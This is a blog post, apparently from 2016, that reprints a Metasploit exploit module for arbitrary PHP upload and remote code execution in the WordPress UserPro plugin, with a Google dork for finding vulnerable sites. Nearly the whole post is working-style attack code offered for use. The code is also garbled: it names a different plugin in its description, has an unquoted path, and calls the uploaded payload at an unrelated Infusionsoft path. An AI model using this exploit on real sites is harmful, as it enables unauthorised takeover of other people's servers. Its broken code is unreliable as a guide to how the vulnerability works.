Saturday, December 24, 2016

WordPress Userpro Remote File Upload

# Exploit Title : Wordpress Userpro Remote File Upload
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://userproplugin.com/
# Google Dork : inurl:/wp-content/plugins/userpro/
# Date : 10/20/2016
# Tested on : Windows10/Linux
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Userpro unauthorization Upload
Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the
wordpress Ifileupload plugin,
  The vulnerability allows for unauthorization file
        upload and remote code execution.
      },
      'Author'         =>
        [
          'T3rm!nat0r5',
          'termijan <poyaterminator@gmail.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['Ref', 'http://priv8.termijan/'],
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['userpro', {}]],
      'DisclosureDate' => 'Oct 20 2016',
      'DefaultTarget'  => 0)
    )
  end

  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'userpro',
'userpro', 'lib', 'fileupload','fileupload.php')
    )

    if res && res.code == 200 && res.body =~ /Code Generator/ &&
res.body =~ /userpro/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    res = send_request_cgi({
      'uri'       => normalize_uri(wp-content, 'plugins',
                     'userpro', 'lib', 'fileupload' , 'fileupload.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
        'fileNamePattern' => php_pagename,
        'fileTemplate'    => payload.encoded
      }
    })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
      print_good("#{peer} - Our payload is at: #{php_pagename}.
Calling payload...")
      register_files_for_cleanup(php_pagename)
    else
      fail_with("#{peer} - Unable deploy payload, server returned #{res.code}")
    end

    print_status("#{peer} - Calling payload ...")
    send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', php_pagename)
    }, 2)
  end

end
# Exploit by T3rm!nat0r5

No comments:

Post a Comment